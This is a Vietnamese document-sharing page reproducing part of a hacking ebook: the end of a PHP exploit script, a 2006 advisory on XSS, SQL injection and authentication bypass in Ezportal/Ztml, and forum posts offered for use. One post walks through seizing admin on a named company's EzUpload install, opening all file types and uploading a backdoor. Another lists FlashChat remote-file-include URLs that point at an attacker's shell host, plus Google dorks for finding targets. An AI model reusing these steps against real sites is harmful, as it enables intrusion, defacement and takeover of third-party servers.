1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 373 potx

6 86 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Ezportal/Ztml v1.0 Multiple Vulnerabilities
Tác giả Hessamx
Trường học Unknown
Chuyên ngành Security
Thể loại Bài viết
Năm xuất bản 2006
Thành phố Unknown
Định dạng
Số trang 6
Dung lượng 94,73 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Thấy hay post Anh em dùng chơi..Cái này sau khi chiếm Admin upload backdoor local ..hơi sướng!. Nhiều file bị lỗi nghiêm trọng giúp attacker có thể chiếm quyền, upload những mã nguy hiểm

Trang 1

sendpacket($packet);

if (strstr($html,"Hauru"))

{

$temp=explode("Hauru",$html);

die($temp[1]);

}

}

echo "Exploit err0r :(\n";

echo "Check register_globals = On and magic_quotes_gpc = off\n";

echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";

?>

black_hat_cr(HCE)

Ezportal/Ztml v1.0 Multiple vulnerabilities

Topic : Ezportal/Ztml v1.0 Multiple vulnerabilities

SecurityAlert Id : 1481

CVE : CVE-2006-4502

CVE : CVE-2006-4501

CVE : CVE-2006-4500

SecurityRisk : Medium

Remote Exploit : Yes

Local Exploit : No

Exploit Given : Yes

Credit : Hessamx hessamx net

Date : 2.9.2006

Affected Software : Ezportal/Ztml v1.0

Advisory Text :

:: Ezportal/Ztml v1.0 Multiple vulnerabilities ::

-

Trang 2

Software : Ezportal/Ztml

Website : http://www.ztml.org

Bug Discover : Hessam-x / www.hessamx.net

I Multiple Cross Site Scripting Vulnerabilities

-

Parameters :

About , Again , Lastname , Email , password , album,

id , table , desc , doc , mname , max , htpl ,pheader , & more

are not properly sanitized in "Index.php"

This can be used to post arbitrary HTML or web script code

Attacker can be execute this url :

index.php?about=[XSS]

index.php?username=GUEST&again=[XSS]

&

II SQL Injection Vulnerabilities

-

Parameters:

Trang 3

about , album , id , use , desc , doc , max , mname , & Other

is not properly sanitized before being used in SQL query

vulnerable Page is : "index.php"

This can be used make any SQL query by injecting arbitrary SQL code

Attacker can be execute this url :

index.php?about=[SQL Query]&use=ezportal.home.about.this.template

index.php?doc=[SQL

Query]&etpl=ezp.home.update.status&ukey=_zdoc.zdoc.group

& other

III Authentication Bypass Vulnerability

-

"Administration Area" script has no any authentication

Any user can get access to administrator's area.Just need to know script name

black_hat_cr(HCE)

EzUpload multi file vulnerabilities

Trang 4

Bài này của lão H2P bên VBF ! Thấy hay post Anh em dùng chơi Cái này sau khi chiếm Admin upload backdoor local hơi sướng ! Hôm nay mới public trên

Securityforcus Anh em nhanh chân nhé !

http://www.securityfocus.com/bid/19175

EzUpload la một chương trình trao đổi file khá hay, tuy nhiên nó có lỗi rất nguy hiểm Nhiều file bị lỗi nghiêm trọng giúp attacker có thể chiếm quyền, upload những mã nguy hiểm

Các file bị lỗi: http://www.securityfocus.com/archive /30/0/threaded

Bắt đầu nhé:

- Download file đính kèm

- Tìm mục tiêu:

Vào google.com search keyword: allinurl: "ezupload" nó ra quá trời kết quả và dĩ nhiên tại thời điểm này gần 100% có thể khai thác

- Khai thác:

Như đã nói ở trên (http://www.securityfocus.com/archive /30/0/threaded) có 5 file dính lỗi nên có nhiều cách khai thác nhưng tôi chỉ hướng dẫn cách "làm admin" khi được làm admin rồi thì không cần biết các cách khác nữa

a Lấy password admin

VD chọn thằng ku: http://handledwithcarecards.com/ezupload để thử Đây là một server riêng của một công ty

Dùng notepad mở file change pass.htm tìm dòng <form method="post"

action="handledwithcarecards.com/ezupload/settings.php"> thay cho phù hợp trong trường hợp này để nguyên <form method="post"

action="http://handledwithcarecards.com/ezupload/settings.php">

Save lại và chạy nó

Ô thứ 3 và thứ 4 (Admin Password) nhập password mới vào (5 ký tự trở lên), các ô khác bỏ trống Nhấn Save Changes và chờ nó chuyển đến một trang xấu hoắc có mỗi cái form nhập pass Nhập cái password của ta vào OK và Control của nó rồi

Trang 5

b Re-config

- Nhấn thẻ Filter: Đánh dấu vào radio trên cùng All file extensions (not

recommended) nhấn Save Changes Cái này sẽ chấp nhận upload tất cả các loại file, làm nhu vậy ta mới có thể upload php/cgi/asp backdoor

- Nhấn thẻ Access Control: Đánh dấu vào radio trên cùng Allows everyone to access the upload form nhấn submit Cái này sẽ chấp nhận anyone upload mà

không cần đăng nhập

c Upload backdoor hoặc file làm bằng chứng đột nhập

Vô http://handledwithcarecards.com/ezupload

để upload backdoor lên Vào lại Admin nhấn thẻ Browse để tìm url của con

backdoor vừa upload

Chạy nó và đọc bài Local Attack để tiếp tục

Xong Xin đừng quậy phá

File Kèm Theo

change pass.zip (3.3 KB, 18 lần tải)

getrootvn(HCE)

FlashChat<=4.5.7 <<Remote File Include

Code:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://địa chỉ con shell

http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://địa chỉ con shell

http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://địa chỉ con shell?

ok, bug remote file include kiếm những site xài cái này trong google với:

Code:

inurl:/inc/cmses/aedating4CMS.php

Ngày đăng: 04/07/2014, 12:20